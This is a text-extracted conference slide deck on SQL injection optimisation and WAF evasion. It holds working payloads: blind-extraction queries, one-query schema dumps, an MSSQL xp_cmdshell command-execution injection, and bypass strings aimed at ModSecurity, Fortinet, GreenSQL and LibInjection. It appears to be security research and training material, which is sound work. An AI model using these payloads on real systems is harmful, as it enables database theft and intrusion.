) UNION SELECT `This_Talk` AS ('New Optimization and Obfuscation Techniques)%00
Roberto Salgado
Co-founder
of
Websec
Provide
informa4on
security
solu4ons
Pen-tes4ng,
training
and
monitoring
Creator
of
The
SQL
Injec4on
KB
Pythonista
/
Security
Researcher
Contact
[email protected]
hHp://www.websec.ca
hHp://www.twiHer.com/@LightOS
Overview
Optimization Analysis
of
Blind
SQLi
methods
Op4mized
queries
Obfuscation Fuzzers
Bypassing
rewalls
Fun
with
encodings
Leapfrog SQLi
LFI
XSS
Exploits of a mom
How
to
prevent
SQL
Injec4ons?
hHp://www.bobby-tables.com
hHp://xkcd.com/327/
OPTIMIZATION
OPTIMIZATION Intro
Why
do
we
care?
hHp://xkcd.com/85/
OPTIMIZATION Blind SQL Injections
Analysis of methods Bisec4on
method
Regex
method
Bitwise
methods
Binary
to
posi4on
(Bin2Pos)
OPTIMIZATION Blind SQL Injections
Quick reminder We
can
only
retrieve
1
character
at
a
4me
We
test
if
we
have
the
correct
character
with
True
and
False
responses
Example SELECT
*
FROM
users
WHERE
id=1
AND
1=1
SELECT
*
FROM
users
WHERE
id=1
AND
1=2
OPTIMIZATION ASCII Table
Each
ASCII
character
can
be
represented
in
1
byte
or
8
bits
Character
Binary
(base
2)
Octal
(base
8)
Decimal
(base
10)
Hexadecimal
(base
16)
a
01100001
141
97
61
OPTIMIZATION ASCII Table
OPTIMIZATION ASCII Table
The
8th
bit
of
the
ASCII
characters
were
interested
in
is
always
0
Decimal
0
127
255
Hexadecimal
00
7F
FF
Binary
00000000
01111111
11111111
The
range
were
interested
in
Decimal
0
127
Hexadecimal
00
7F
Binary
00000000
01111111
OPTIMIZATION Bisection Method
Binary
search
algorithm
ASCII
range
32
126
Split
in
half:
(32
+
126)
/
2
=
79
Is
the
value
greater
or
lesser?
Split
result
in
half
again
and
repeat
OPTIMIZATION Bisection Method
a
=
97
decimal
97
between
79
and
126
97
between
79
and
103
97
between
79
and
91
97
between
91
and
103
97
between
91
and
97
97
between
91
and
95
97
between
95
and
97
True
True
False
True
True
False
True
(32
+
126)
/
2
=
79
(79
+
126)
/
2
=
102.5
(79
+
103)
/
2
=
91
(91
+
103)
/
2
=
97
(91
+
97)
/
2
=
95
(95
+
97)
/
2
=
96
97
!=
96
97
==
97
OPTIMIZATION Bisection Method
Binary Search Tree
1,2,3,4,5,6,7,8
1,2,3,4
5,6,7,8
1,2
3,4
5,6
7,8
OPTIMIZATION Bisection Method
Bisection method Pros:
Logarithmic
log2(N)
Divide-and-conquer
algorithm
6-7
RPC
Cons:
Same
average
case
/
worst
case
scenario
OPTIMIZATION Regex Method
Regex method - By Simone 'R00T_ATI' Quatrini and Marco 'white_sheep' Rondini
REGEXP
'^[a-z]'
REGEXP
'^[a-n]'
REGEXP
'^[a-g]'
REGEXP
'^[h-n]'
REGEXP
'^[h-l]'
True
True
False
True
False
OPTIMIZATION Regex Method
Regex method - By Simone 'R00T_ATI' Quatrini and Marco 'white_sheep' Rondini Pros:
No
need
to
convert
to
decimal
Bisec4on
method
on
REGEX
Cons:
Same
amount
of
requests
as
bisec4on
OPTIMIZATION Bitwise Methods
Each
ASCII
character
can
be
represented
in
1
byte
or
8
bits
The
MSB
of
the
ASCII
range
of
characters
we're
interested
in
is
always
0
The
amount
of
requests
will
always
be
7
OPTIMIZATION Bitwise Methods
"Faster Blind MySQL Injection Using Bit Shifting" - By Jelmer de Hen a
=
97
dec
=
01100001
(97
>>
7)
=
0
(97
>>
6)
=
0
(97
>>
5)
=
2
(97
>>
4)
=
6
1
or
0
1
or
0
010
or
011
0110
or
0111
1
0
0
1
OPTIMIZATION Bitwise Methods
"Faster Blind MySQL Injection Using Bit Shifting" - By Jelmer de Hen Pros:
The
amount
of
requests
is
consistent
Cons:
Always
uses
7
RPC
Weird
implementa4on
No
threading
OPTIMIZATION Bitwise Methods
"Faster Blind MySQL Injection Using Bit Shifting" My variation
01100001
01100001
01100001
01100001
01100001
01100001
01100001
01100001
>>
7
>>
6
>>
5
>>
4
>>
3
>>
2
>>
1
>>
0
00000000
00000001
00000011
00000110
00001100
00011000
00110000
01100001
0
1
3
6
12
24
48
97
OPTIMIZATION Bitwise Methods
"Faster Blind MySQL Injection Using Bit Shifting" My variation a
=
97
dec
=
01100001
substr(bin(97>>7),-1,1)
substr(bin(97>>6),-1,1)
substr(bin(97>>5),-1,1)
substr(bin(97>>4),-1,1)
1
or
0
1
or
0
1
or
0
1
or
0
0
1
1
0
OPTIMIZATION Bitwise Methods
"Faster Blind MySQL Injection Using Bit Shifting" My variation Pros:
The
amount
of
requests
is
consistent
Threading
Cons:
Always
uses
7
RPC
OPTIMIZATION Bitwise Methods
"Bit ANDing" - By Ruben Ventura a
=
97
dec
=
01100001
97
&
1
97
&
2
97
&
4
97
&
8
00000001
00000010
00000100
00001000
OPTIMIZATION Bitwise Methods
"Bit ANDing" - By Ruben Ventura a
=
97
dec
=
01100001
97
&
1
97
&
2
97
&
4
97
&
8
00000001
00000010
00000100
00001000
1
OPTIMIZATION Bitwise Methods
"Bit ANDing" - By Ruben Ventura a
=
97
dec
=
01100001
97
&
1
97
&
2
97
&
4
97
&
8
00000001
00000010
00000100
00001000
1
0
OPTIMIZATION Bitwise Methods
"Bit ANDing" - By Ruben Ventura a
=
97
dec
=
01100001
97
&
1
97
&
2
97
&
4
97
&
8
00000001
00000010
00000100
00001000
1
0
0
OPTIMIZATION Bitwise Methods
"Bit ANDing" - By Ruben Ventura a
=
97
dec
=
01100001
97
&
1
97
&
2
97
&
4
97
&
8
00000001
00000010
00000100
00001000
1
0
0
0
OPTIMIZATION Bitwise Methods
"Bit ANDing" - By Ruben Ventura a
=
97
dec
=
01100001
97
&
1
97
&
2
97
&
4
97
&
8
00000001
00000010
00000100
00001000
1
0
0
0
OPTIMIZATION Bitwise Methods
"Bit ANDing" - By Ruben Ventura Pros:
The
amount
of
requests
is
consistent
Threading
Cons:
Always
uses
7
RPC
OPTIMIZATION Bin2Pos Method
Requires
a
set
of
possible
characters
(32
126
decimal)
The
closer
the
char
is
to
the
beginning
of
the
set,
the
less
amount
of
requests
required
We
can
arrange
the
set
of
characters
by
most
common
leHers
OPTIMIZATION Bin2Pos Method
Map
the
character
to
its
posi4on
in
the
set
Convert
this
posi4on
to
binary
Now
we
have
reduced
the
characters
we
have
to
look
for
to
2
(0
and
1)
OPTIMIZATION Bin2Pos Method
Our
set
(without
capitals)
abcdefghijklmnopqrstuvwxyz _0123456789,.<>/?;:\'"[{]}\|=+-) (*&^%$#@!`~ 0123456789ABCDEF BIN(1) = 1 BIN(94) = 1011110
A
hex
set
Largest
set
has
94
posi4ons
OPTIMIZATION Bin2Pos Method
IF((@a:=MID(BIN(POSITION(MID((SELECT
password
from
users
where
id=2
LIMIT
1),1,1)IN
(CHAR(48,49,50,51,52,53,54,55,56,57,65,66,67,68,69,7 0))),1,1))!=space(0),2-@a,0/0)
OPTIMIZATION Bin2Pos Method
LOWERCASE_SET
=
(a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z, 0,1,2,3,4,5,6,7,8,9,_,!,@,#,$,%,^,&,*,(,),-,+,=,\,,.,
\",
',~,`,\\,|, {,},[,],:,;,
)
OPTIMIZATION Bin2Pos Method
C
is
3rd
posi4on
in
the
set,
which
equals
11
in
binary
Our
request
starts
with
the
rst
on
bit
Therefore,
the
rst
number
will
always
be
1
OPTIMIZATION Bin2Pos Method
Retrieving 11 We
know
the
rst
digit
is
1
No
request
required
Is
the
second
digit
1?
True
Is
the
third
digit
1?
False,
there
is
no
third
digit
Total
requests
required
for
C:
2
OPTIMIZATION Bin2Pos Method
Taking it a step further
The
most
common
rst
leHer
in
a
word
in
order
of
frequency
T,
O,
A,
W,
B,
C,
D,
S,
F,
M,
R,
H,
I,
Y,
E,
G,
L,
N,
O,
U,
J,
K
LeHers
most
likely
to
follow
E
in
order
of
frequency
R,S,N,D
The
most
common
digraphs
on
order
of
frequency
TH,
HE,
AN,
IN,
ER,
ON,
RE,
ED,
ND,
HA,
AT,
EN,
ES,
OF,
NT,
EA,
TI,
TO,
IO,
LE,
IS,
OU,
AR,
AS,
DE,
RT,
VE
The
most
common
trigraphs
in
order
of
frequency
THE,
AND,
THA,
ENT,
ION,
TIO,
FOR,
NDE,
HAS,
NCE,
TIS,
OFT,
MEN
hHp://scoHbryce.com/cryptograms/stats.htm
OPTIMIZATION Bin2Pos Method
Pros:
Only
1-6
RPC
No
maHer
the
size
of
the
set,
RPC
will
always
be
less
than
bisec4on
Cons:
Requires
2
dierent
parameter
values
OPTIMIZATION Bin2Pos Method
Comparison
of
methods
350
35%
292
301
300
250
224
200
29%
47%
88
91
105
47
147
189
150
100
50
0
CHARACTER_SET
Bin2Pos
MD5('ABC123')
Bisec4on
Bitwise
THE
QUICK
BROWN
FOX
JUMPS
OVER
THE
LAZY
DOG
OPTIMIZATION Method Comparison
DEMO
OPTIMIZING QUERIES
OPTIMIZING QUERIES Data Extraction
Retrieve
all
databases,
tables
and
columns
with
just
one
query.
OPTIMIZING QUERIES MySQL By Ionut Maroiu SELECT
(@)
FROM
(SELECT(@:=0x00),(SELECT
(@)
FROM
(informa4on_schema.columns)
WHERE
(table_schema>=@)
AND
(@)IN
(@:=CONCAT(@, 0x0a,'
[
',table_schema,'
]
>',table_name,'
>
',column_name))))x
OPTIMIZING QUERIES MySQL - Demo
Demo
OPTIMIZING QUERIES MSSQL By Daniel Kachakil
SELECT
table_name
+
',
'
FROM
informa4on_schema.tables
FOR
XML
PATH('')
OPTIMIZING QUERIES Oracle
SELECT
RTRIM(XMLAGG(XMLELEMENT(e,
table_name
||
',')).EXTRACT('//text()').EXTRACT('//text()')
,',')
FROM
all_tables
OPTIMIZING QUERIES PostgreSQL By Dmitriy Serebryannikov
SELECT
array_to_json(array_agg(tables))::text
FROM
(SELECT
schemaname,
relname
FROM
pg_stat_user_tables)
AS
tables
LIMIT
1
OPTIMIZING QUERIES MSSQL One query for RCE Check
to
see
if
xp_cmdshell
is
loaded
If
enabled,
check
if
ac4ve
Run
the
'dir'
command
and
store
the
results
into
TMP_DB
OPTIMIZING QUERIES MSSQL
'
IF
EXISTS
(SELECT
1
FROM
INFORMATION_SCHEMA.TABLES
WHERE
TABLE_NAME='TMP_DB')
DROP
TABLE
TMP_DB
DECLARE
@a
varchar(8000)
IF
EXISTS(SELECT
*
FROM
dbo.sysobjects
WHERE
id
=
object_id
(N'[dbo].[xp_cmdshell]')
AND
OBJECTPROPERTY
(id,
N'IsExtendedProc')
=
1)
BEGIN
CREATE
TABLE
%23xp_cmdshell
(name
nvarchar(11),
min
int,
max
int,
cong_value
int,
run_value
int)
INSERT
%23xp_cmdshell
EXEC
master..sp_congure
'xp_cmdshell'
IF
EXISTS
(SELECT
*
FROM
%23xp_cmdshell
WHERE
cong_value=1)BEGIN
CREATE
TABLE
%23Data
(dir
varchar(8000))
INSERT
%23Data
EXEC
master..xp_cmdshell
'dir'
SELECT
@a=''
SELECT
@a=Replace(@a %2B'<br></font><font
color="black">'%2Bdir,'<dir>','</font><font
color="orange">')
FROM
%23Data
WHERE
dir>@a
DROP
TABLE
%23Data
END
ELSE
SELECT
@a='xp_cmdshell
not
enabled'
DROP
TABLE
%23xp_cmdshell
END
ELSE
SELECT
@a='xp_cmdshell
not
found'
SELECT
@a
AS
tbl
INTO
TMP_DB--
OPTIMIZING QUERIES MSSQL - Demo
Demo
OPTIMIZING QUERIES More Single Liners Tes4ng
can
become
tedious
Injec4ons
can
use
single,
double
or
no
quota4ons
at
all
400+
parameters/module
3
separate
tests
for
each
varia4on:
OR
1=1
OR
'1'='1
OR
1=1
OPTIMIZING QUERIES More Single Liners How
about
fusing
them?
- OR 1#"OR"'OR''='"="'OR''='
OPTIMIZING QUERIES More Single Liners How
about
fusing
them?
- OR 1#"OR"'OR''='"="'OR''=' No
quota4ons
OPTIMIZING QUERIES More Single Liners How
about
fusing
them?
- OR 1#"OR"'OR''='"="'OR''=' No
quota4ons
Double
quota4ons
OPTIMIZING QUERIES More Single Liners How
about
fusing
them?
- OR 1#"OR"'OR''='"="'OR''=' No
quota4ons
Double
quota4ons
Single
quota4ons
OPTIMIZING QUERIES More Single Liners What
about
ANDing?
- !=0--+"!="'!='
OPTIMIZING QUERIES More Single Liners What
about
ANDing?
- !=0--+"!="'!=' No
quota4ons
OPTIMIZING QUERIES More Single Liners What
about
ANDing?
- !=0--+"!="'!=' No
quota4ons
Double
quota4ons
OPTIMIZING QUERIES More Single Liners What
about
ANDing?
- !=0--+"!="'!=' No
quota4ons
Double
quota4ons
Single
quota4ons
OBFUSCATION
OBFUSCATION What is it?
hHp://wellington.pm.org/archive/200704/simple_obfu/images/obfusca4on_02.png
OBFUSCATION How to confuse an admin
UNION
select@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO
$
fRom(SeLEct@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO
frOM`informa4on_schema`.`triggers`)0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO
WHere
!FAlSE||tRue&&FalSe||FalsE&&TrUE
like
TruE||FalSE
union/*! 98765select@000OO0O0OooOoO0OOoooOOoOooo0o0o:=grOup_cONcaT(`username`)``from(users)whErE(username)like'admin'limi t
1*/select@000OO0O0OooOoO0OOoooO0oOooo0o0o
limit
1,0
UnION
SeleCt(selEct(sELecT/*! 67890sELect@000OO0O0O0oOoO0OOoooOOoOooo0o0o:=group_concat(`table_name`)FrOM
informa4on_schema.sta4s4cs
WhERE
TABLe_SCHEmA
In(database())*//*!@000OO0O0OooOoO0OOoooO0oOooo0o0o:=gROup_conCat(/*!taBLe_naME)*/fRoM
informa4on_schema.par44ons
where
TABLe_SCHEma
not
in(concat((select
insert(insert((select
(colla4on_name)from(informa4on_schema.colla4ons)where(id)=true +true),true,oor(pi()),trim(version()from(@@version))),oor(pi()),ceil(pi()*pi()),space(0))),
conv((125364/(true-!true))-42351,
ceil(pi()*pi()),oor(pow(pi(),pi()))),mid(aes_decrypt(aes_encrypt(0x6175746F6D6174696F6E,0x4C696768744F53), 0x4C696768744F53)FROM
oor(version())
FOR
ceil(version())),rpad(reverse(lpad(colla4on(user()),ceil(pi())--@@log_bin,0x00)),!
! true,0x00),CHAR((ceil(pi())+!false)*ceil((pi()+ceil(pi()))*pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--cos(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))-- ceil(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))-cos(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--oor(pi()*pi()),(ceil(pi()*pi())*ceil(pi()*pi()))-oor(pi()))), 0x6d7973716c))from(select--(select~0x7))0o0oOOO0Oo0OOooOooOoO00Oooo0o0oO)from(select@/*!/*!$*/from(select +3.``)000oOOO0Oo0OOooOooOoO00Oooo0o0oO)0o0oOOO0Oo0OOooOooOoO00Oooo0o0oO/*! 76799sElect@000OO0O0OooOoO00Oooo0OoOooo0o0o:=group_concat(`user`)``from`mysql.user`WHeRe(user)=0x726f6f74*/ #(SeLECT@
uNioN
sElEcT
AlL
group_concat(cOLumN_nAME,1,1)FroM
InFoRMaTioN_ScHemA.COLUMNS
where
taBle_scHema
not
in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c)UNION
SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO
UNION
SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO
UNION
SELECT@000OO0O0OooOoO0OOoooO0oOooo0o0oOO
UNION
SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO)
BYPASSING FIREWALLS
BYPASSING FIREWALLS General Tips
Read
documenta4on
for
unexpected
behavior
and
oddi4es
Learn
what
the
DBMS
is
capable
of
and
what
it
can
handle
Fuzzers
can
help
nd
undocumented
oddi4es
Be
crea4ve!
OBFUSCATION Simple PHP Fuzzer
<?php
$link
=
mysql_connect('localhost',
'root',
'');
for($i=0;
$i<=255;
$i++)
{
$query
=
mysql_query("SELECT
1
FROM
dual
WHERE
1"
.
chr($i)
.
"=1");
if(!$query)
{
con4nue;
}
echo
$i
.
':0x'
.
dechex($i)
.
':'
.
chr($i)
.
'<br>';
}
?>
OBFUSCATION Simple PHP Fuzzer
OBFUSCATION Simple Python Fuzzer
def
main():
warnings.warn("deprecated",
Depreca4onWarning)
db
=
MySQLdb.connect(host="localhost",
user="root",
passwd="",
db="test",
port=1337)
cursor
=
db.cursor()
for
a
in
range(256):
try:
cursor.execute("SELECT
1
FROM%susers
WHERE
1=1
limit
1"
%
(chr(a)))
print
"a:%d:%s:%s"
%
(a,
hex(a),
chr(a)
if
a!=10
else
"NEW
LINE")
except
(MySQLdb.Error):
cursor
=
db.cursor()
conEnue
OBFUSCATION Allowed Whitespaces
SQLite3
- 0A, 0D, 0C, 09, 20
MySQL
5
- 09, 0A, 0B, 0C, 0D, A0, 20
MySQL
3
- 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20, 7F, 80, 81, 88, 8D, 8F, 90, 98, 9D, A0
OBFUSCATION Allowed Whitespaces
PostgreSQL
- 0A, 0D, 0C, 09, 20
Oracle
11g
- 00, 0A, 0D, 0C, 09, 20
MSSQL
- 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20
OBFUSCATION Allowed Whitespaces
SELECT*FROMusersWHERE1=1
OBFUSCATION Allowed Whitespaces
BYPASSING FIREWALLS MySQL Obfuscation
1.UNION
SELECT
2
3.2UNION
SELECT
2
1e0UNION
SELECT
2
SELECT\N/0.e3UNION
SELECT
2
1e1AND-0.0UNION
SELECT
2
1/*!12345UNION/*!31337SELECT/*!table_name*/
{ts
1}UNION
SELECT.``
1.e.table_name
SELECT
$.``
1.e.table_name
SELECT{_
.``1.e.table_name}
SELECT
LightOS
.
``1.e.table_name
LightOS
SELECT
informa4on_schema
1337.e.tables
13.37e.table_name
SELECT
1
from
informa4on_schema
9.e.table_name
BYPASSING FIREWALLS MSSQL Obfuscation
.1UNION
SELECT
2
1.UNION
SELECT.2alias
1e0UNION
SELECT
2
1e1AND-1=0.0UNION
SELECT
2
SELECT
0xUNION
SELECT
2
SELECT\UNION
SELECT
2
\1UNION
SELECT
2
SELECT
1FROM[table]WHERE\1=\1AND\1=\1
SELECT"table_name"FROM[informa4on_schema].[tables]
BYPASSING FIREWALLS Oracle Obfuscation
1FUNION
SELECT
2
1DUNION
SELECT
2
SELECT
0x7461626c655f6e616d65
FROM
all_tab_tables
SELECT
CHR(116)
||
CHR(97)
||
CHR(98)
FROM
all_tab_tables
SELECT%00table_name%00FROM%00all_tab_tables
BYPASSING FIREWALLS General Tips
Don't
start
with
something
obvious
- 1 UNION SELECT GROUP_CONCAT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES
Instead,
keep
it
simple!
- CASE WHEN BINARY TRUE THEN TRUE END IS NOT UNKNOWN HAVING TRUE FOR UPDATE
BYPASSING FIREWALLS - SQLi Obfuscation
Modsecurity
-2
div
1
union
all
#in
#between
comments
#in
#between
comments
select
0x00,
0x41
like/*!31337table_name*/,3
from
informa4on_schema.tables
limit
1
BYPASSING FIREWALLS - SQLi Obfuscation
Modsecurity
CASE
WHEN
BINARY
TRUE
THEN
TRUE
END
IS
UNKNOWN
FOR
UPDATE
UNION
SELECT
MATTRESSES
1
MOD
0.2UNION%A0SELECT
1,current_user,3
BYPASSING FIREWALLS - SQLi Obfuscation
Fortinet
S%A0E%B1L%C2E%D3C%E4T%F6
1
U%FFNION
SEL%FFECT
2
BYPASSING FIREWALLS - SQLi Obfuscation
GreenSQL
-1
UNION
SELECT
table_name
FROM
informa4on_schema.tables
limit
1
1
AND
1=0
UNION
SELECT
table_name
FROM
informa4on_schema.tables
limit
1
1
AND
1=0.e1
UNION
SELECT
table_name
FROM
informa4on_schema.tables
limit
1
1
AND
1=
binary
1
UNION
SELECT
table_name
FROM
informa4on_schema.tables
limit
1
IF((SELECT
mid(table_name,1,1)
FROM
informa4on_schema.tables
limit
1)
=C,1,2)
BYPASSING FIREWALLS - SQLi Obfuscation
GreenSQL
BYPASSING FIREWALLS - SQLi Obfuscation
LibInjection
-1
UNION
SELECT
table_name
Websec
FROM
informa4on_schema.tables
LIMIT
1
-1
UNION%0ASELECT
table_name
FROM
informa4on_schema.tables
LIMIT
1
-1fUNION
SELECT
column
FROM
table
1;
DECLARE
@test
AS
varchar(20);
EXEC
master.dbo.xp_cmdshell
'cmd'
-[id]
UNION
SELECT
table_name
FROM
informa4on_schema.tables
LIMIT
1
{d
2}
UNION
SELECT
table_name
FROM
informa4on_schema.tables
LIMIT
1
BYPASSING FIREWALLS - SQLi Obfuscation
LibInjection
1
between
1
AND`id`
having
0
union
select
table_name
from
informa4on_schema.tables
1
mod
/*!1*/
union
select
table_name
from
informa4on_schema.tables--
true
is
not
unknown
for
update
union
select
table_name
from
informa4on_schema.tables
test'-1/1/**/union(select
table_name
from
informa4on_schema.tables
limit
1,1)
-1
union
select
@``"",
table_name
from
informa4on_schema.tables
-1
LOCK
IN
SHARE
MODE
UNION
SELECT
table_name
from
informa4on_schema.tables
$.``.id
and
0
union
select
table_name
from
informa4on_schema.tables
-(select
@)
is
unknown
having
1
UNION
select
table_name
from
informa4on_schema.tables
/*!911111*//*!0*/union
select
table_name
x
from
informa4on_schema.tables
limit
1
-1.for
update
union
select
table_name
from
informa4on_schema.tables
limit
1
-0b01
union
select
table_name
from
informa4on_schema.tables
limit
1
1<binary
1>2
union
select
table_name
from
informa4on_schema.tables
limit
1
-1
procedure
analyse(1gfsdgfds,
sfg)
union
select
table_name
from
informa4on_schema.tables
limit
1
BYPASSING FIREWALLS Encodings
URL
encode
Double
URL
encode
Unicode
encode
UTF-8
mul4-byte
encode
First
Nibble
Second
Nibble
Double
Nibble
Invalid
Percent
encode
Invalid
Hex
encode
BYPASSING FIREWALLS Encodings URL Encode
URL
Encoding
is
used
to
transform
special
characters,
so
they
can
be
sent
over
HTTP
Characters
get
transformed
to
their
hexadecimal
equivalent,
prexed
with
a
percent
sign
a
=
%61
BYPASSING FIREWALLS Encodings Double URL Encode
Double
URL
encode
is
the
process
of
re-encoding
percent
sign
a
=
%61
%61
=
%2561
BYPASSING FIREWALLS Encodings URL Encode / Weak Firewall
Descrip4on
of
SQLMAP
tamper
script
charencode
used
to
URL
encode
the
request:
Useful
to
bypass
very
weak
web
applica2on
rewalls
that
do
not
url-decode
the
request
before
processing
it
through
their
ruleset
BYPASSING FIREWALLS Encodings URL Encode / Weak Firewall
Demo
BYPASSING FIREWALLS Encodings Unicode
Similar
to
URL
encoding,
however
the
hex
character
is
prexed
with
u00
Supported
by
IIS
a
=
%61
%61
=
%u0061
BYPASSING FIREWALLS Encodings UTF-8 Multi-byte
The
leading
bits
of
the
rst
byte,
up
to
the
rst
0,
represent
the
total
number
of
following
bytes
to
complete
the
sequence
The
following
bits
aer
the
rst
0
in
the
rst
byte
form
part
of
character
Each
consecu4ve
byte
has
10
in
the
high-order
posi4on,
however
these
two
bits
are
redundant
BYPASSING FIREWALLS Encodings UTF-8 Multi-byte
Bytes
in
Byte
1
sequence
1
2
3
4
5
6
0xxxxxxx
110xxxxx
1110xxxx
Byte
2
10xxxxxx
10xxxxxx
Byte
3
10xxxxxx
10xxxxxx
10xxxxxx
10xxxxxx
Byte
4
10xxxxxx
10xxxxxx
10xxxxxx
Byte
5
10xxxxxx
10xxxxxx
Byte
6
10xxxxxx
11110xxx
10xxxxxx
111110xx
10xxxxxx
1111110x
10xxxxxx
BYPASSING FIREWALLS Encodings UTF-8 Multi-byte
Byte
Sequence
2
byte
sequence
2
byte
sequence
2
byte
sequence
2
byte
sequence
3
byte
sequence
Character
a
encoded
%c1%a1
%c1%21
%c1%61
%c1%e1
%e0%81%a1
First
two
high
order
bits
10
00
01
11
10
BYPASSING FIREWALLS Encodings Nibble
A
nibble
is
4
bits
One
nibble
represents
a
hex
digit
(2^4
=
16)
Two
nibbles
or
an
octet,
represent
a
hex
character
BYPASSING FIREWALLS Encodings Nibble
Hex
0
1
2
3
4
5
6
7
8
9
A
B
C
D
E
F
Decimal
0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
Octal
0
1
2
3
4
5
6
7
10
11
12
13
14
15
16
17
Binary
0000
0001
0010
0011
0100
0101
0110
0111
1000
1001
1010
1011
1100
1101
1110
1111
BYPASSING FIREWALLS Encodings First Nibble
First
4
leading
bits
are
URL
encoded
a
=
%61
6
=
%36
%%361
BYPASSING FIREWALLS Encodings Second Nibble
Last
4
remaining
bits
are
URL
encoded
a
=
%61
1
=
%31
%6%31
BYPASSING FIREWALLS Encodings Double Nibble
Combina4on
of
rst
nibble
+
second
nibble
encoding
a
=
%61
6
=
36
1
=
%31
%%36%31
BYPASSING FIREWALLS Encodings Invalid Percent
IIS
removes
the
percent
sign
when
not
used
with
valid
hex
The
WAF
receives:
%SE%LE%CT
%1
%F%R%%%%%OM
%TA%B%L%E%
However,
IIS
reads
it
as:
SELECT
1
FROM
TABLE
BYPASSING FIREWALLS Encodings Invalid Hex
Create
invalid
hex
that
results
in
the
same
decimal
value
as
valid
hex
a
=
%61
%61
=
6
*
16
+
1
=
97
%2
=
2
*
16
+
65
=
97
%2
is
the
same
as
%61
BYPASSING FIREWALLS Encodings Invalid Hex
Decimal
10
11
12
13
14
15
16
17
Valid
Hex
0A
0B
0C
0D
0E
0F
10
11
Invalid
Hex
0A
0B
0C
0D
0E
0F
0G
0H
LEAPFROG
LEAPFROG What is it? A
tool
designed
to
harden
your
rewall
Finds
bypasses
for
dierent
web
aHacks
SQLi
XSS
LFI
Content
Filters
Creates
all
its
payloads
dynamically
Provides
recommenda4ons
on
successful
bypasses
Generates
a
score
based
on
successful
bypasses
LEAPFROG WAF Acceptance Factor WAF
Acceptance
Factor
is
a
score
based
on
the
amount
of
malicious
requests
detected
LEAPFROG Wife Acceptance Factor Wife
Acceptance
Factor
borrowed
from:
hHp://en.wikipedia.org/wiki/Wife_acceptance_factor
DEMO
THE END
THE END Contact Information
www.WEBSEC.ca